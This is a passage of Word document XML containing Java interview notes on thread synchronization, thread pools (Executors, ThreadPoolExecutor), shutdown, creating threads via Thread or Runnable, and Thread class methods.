    <w:p w14:paraId="7B2B4F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ynchronized method to ensure only one thread can access it at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E5F5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ynchronized void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC7E1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7AAF4C3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20BDBD5" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFD4BF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0F58883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526F84D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492A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0EC0DD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Block Synchronization):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADB4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2A2B30B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55F91075" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF93D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4AC7D7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nchronized (this) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FABBF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2AD0368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0C95F8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8622FCF" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D0DE6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2CF11D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38F9995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A7DB0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2EF8430"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Other Synchronization Mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AEE6C6"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entrant Locks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D822C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ReentrantLock in java.util.concurrent.locks package provides more advanced locking capabilities, such as trying to acquire a lock without blocking, timed locking, and interruptible locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA245F"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Volatile Keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53123DAE"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volatile keyword ensures that changes made to a variable by one thread are immediately visible to other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD52F13"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tomic Variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767BD73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Classes in java.util.concurrent.atomic (like AtomicInteger, AtomicLong) allow for atomic operations without explicit synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB9D91"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ad-Write Locks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD875A7"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055A9F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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="595D1649"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97" w:name="_Toc197867511"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create a Thread pool in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="297"/>
    </w:p>
    <w:p w14:paraId="13B8B6D5" w14:textId="4CCB30B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Java, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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reating a Thread Pool in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1690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Java provides several ways to create a thread pool, mainly using the ExecutorService interface from the java.util.concurrent package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C223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Here are the steps to create and use a thread pool in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCEF13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Using Executors class to create a thread pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A09AA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Executors class in Java provides several static methods to create different types of thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE6510C"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01BFFFC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DC4DEB2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A0253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4EC1661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C76140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08EC7AE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73331E9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0B2A90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7AF77211" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DFED0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ThreadPoolExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069469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695A7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fixed-size thread pool with 4 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364594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ExecutorService threadPool = Executors.newFixedThreadPool(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266F0E7C" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8B7B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thread pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B9A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47305BE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ubmit(new MyRunnable());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2541B27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4692087" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3011C0F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 after task completion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3423DEF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hutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D04B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D1AC4A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6F75B9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Types of Thread Pools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A82762B"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ixed Thread Pool (newFixedThreadPool(int nThreads)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FC2B2F"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fixed number of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A11829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when you want to limit the number of threads and ensure all threads are used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCABC0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fixedThreadPool = Executors.newFixedThreadPool(4); // 4 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789B6F91"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Cached Thread Pool (newCachedThreadPool()):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E13FB84"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reates new threads as needed but will reuse previously constructed threads when they are available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA5023E"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deal for applications with many short-lived tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5853F823"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cachedThreadPool = Executors.newCachedThreadPool();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28633AF8"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Single Thread Executor (newSingleThreadExecutor()):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DA1749"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single worker thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BC012C"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l tasks are executed sequentially in the order they are submitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1585AA90"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singleThreadExecutor = Executors.newSingleThreadExecutor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED1BEC"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cheduled Thread Pool (newScheduledThreadPool(int corePoolSize)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54FCC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an schedule tasks to run after a delay or periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29717805"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for running periodic tasks like scheduled tasks or fixed-rate executions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01160DB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cheduledExecutorService scheduledThreadPool = Executors.newScheduledThreadPool(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461809C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Creating a custom thread pool with ThreadPoolExecutor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C06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 need more control over the behavior of the thread pool (such as setting the queue size, thread timeouts, etc.), you can create a custom thread pool using the ThreadPoolExecutor class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C91E0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E916BF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BE723B7" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D52068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ED194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093CDCD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7EEFC7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4FB7970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129D7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D3F77FE" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16EB2C7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CustomThreadPoolExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57154E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772A2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e a thread pool with custom parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E1510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Executor customThreadPool = new ThreadPoolExecutor(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EEB8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2, // core pool size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122A39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4, // maximum pool size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F3C73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60, // idle thread timeout (in seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2E5E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imeUnit.SECONDS, // time unit for the timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE28BF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new LinkedBlockingQueue&lt;&gt;(10) // task queue (capacity 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A21B22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9BCF144" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="008088C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custom thread pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C3AA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1632AB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ubmit(new MyRunnable());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EC1CD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D1B04B2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409021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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745DD59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hutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6E62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548554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2FCB9A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3. Shutting down a Thread Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146BC16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nce you're done submitting tasks, it’s important to shut down the thread pool gracefully. This can be done using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E7053B"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t initiates an orderly shutdown in which previously submitted tasks are executed, but no new tasks will be accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC04B20"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It attempts to stop all actively executing tasks and halts the processing of waiting tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450EE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7F214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threadPool = Executors.newFixedThreadPool(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D01E1BB" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3DA4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Submit tasks...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D39C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Pool.shutdown();  // Gracefully shuts down the pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E2F6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Key Methods for ExecutorService:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDD4FB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ubmit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Submits a task to be executed by the thread pool. It returns a Future object that can be used to monitor or get the result of the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B49173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nvokeAll()</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Submits a collection of tasks for execution and waits for them to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0DA2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invokeAny()</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Submits a collection of tasks for execution and returns the result of the first successfully completed task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C314708"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nitiates an orderly shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597EAF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Tries to stop all running tasks immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3130BA"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Advantages of Using Thread Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362750E6"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duced Overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reusing threads from the pool reduces the overhead of creating new threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D574ED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etter Resource Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The thread pool allows you to control the maximum number of concurrent threads, avoiding resource exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3977517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roved Performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tasks are executed efficiently by reusing threads rather than creating new ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C014B"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lexibility:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can customize the thread pool behavior, such as the number of threads, task queue size, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A5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2829D1A5" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00CE4B95" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF6C79" w14:textId="77777777" w:rsidR="00A920A9" w:rsidRPr="00CE4B95" w:rsidRDefault="00A920A9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="298" w:name="_Toc197867512"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which method you will override in order to create a thread?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="298"/>
    </w:p>
    <w:p w14:paraId="0BD03C31" w14:textId="1BB66BAB" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To create a thread in Java, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>override the run() method</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the Runnable interface or the Thread class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA1D9AC"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There are two main ways to create a thread in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32288C54"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1. By Extending the Thread class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589C3B1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You can create a custom thread by extending the Thread class and overriding its run() method. The run() method contains the code that will be executed by the thread when it starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C94EE79"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788D8C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Thread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6952C2D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2708A31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1164A6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5D5583B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34AA512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4F7366F" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AEFF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ThreadExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02437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7098F14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instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366C13F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Thread thread = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B46FB4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D22484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473CA1B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7C13D6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017AB4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4711F1F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2. By Implementing the Runnable interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160DF2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3D8EEA6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Runnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC2921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796C1436"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425045D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1C951F0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FD33C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5C61F14" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA2E46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RunnableExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3022499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2E6D385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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        // Create a Runnable object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F16197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Runnable runnable = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDC0A9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7D8E9E8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with the Runnable object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6364043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 thread = new Thread(runnable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F01CEB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53638F6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2D805AB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302546E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11E8BCD"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2BE5F69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Key Difference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABE89B8"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Extending Thread:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You directly extend the Thread class and override its run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB639C6"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Implementing Runnable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You implement the Runnable interface and pass the instance to a Thread object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD34A4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Both approaches achieve the same result, but using the Runnable interface is preferred in most cases because it allows greater flexibility and doesn't limit you to extending the Thread class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7680171B" w14:textId="0103E4E7"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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A0521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99" w:name="_Toc197867513"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are all methods present in Thread class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="299"/>
    </w:p>
    <w:p w14:paraId="325A6678" w14:textId="674CF39D" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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 class in Java provides several methods for managing and controlling thread execution. Below is a list of important methods present in the Thread class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5119D26C"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start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AA685A"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starts the execution of the thread. It calls the run() method of the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32722CD9"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ynchronized void start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F46BD"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rt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB9AC8E"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run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071DB302"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e method that contains the code to be executed by the thread. It is called when start() is invoked on a thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19690B1A"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run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDBA0D6"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You override this method in a custom thread to specify the behavior of the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB61B05"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sleep(long millis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E374A3B"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sleep (suspend execution) for the specified number of milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A27BB35"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sleep(long millis) throws InterruptedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4145D12C"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leep(1000); // Sleep for 1 second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E76548F"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yield()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C96C80C"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pause and allow other threads of the same priority to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F851C86"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yield()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A401F2"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yield();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEB5C69"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1644E42B"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Interrupts the thread. It sets the thread’s interrupt flag to true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1F131"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interrupt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBEC366"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interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205AF327"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isAlive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2EE380"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still alive (i.e., has been started and has not yet died), and false otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDA9885"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Alive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619D2D4"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status = thread.isAlive();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B9BE7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getId()</w:t>
      </w:r>
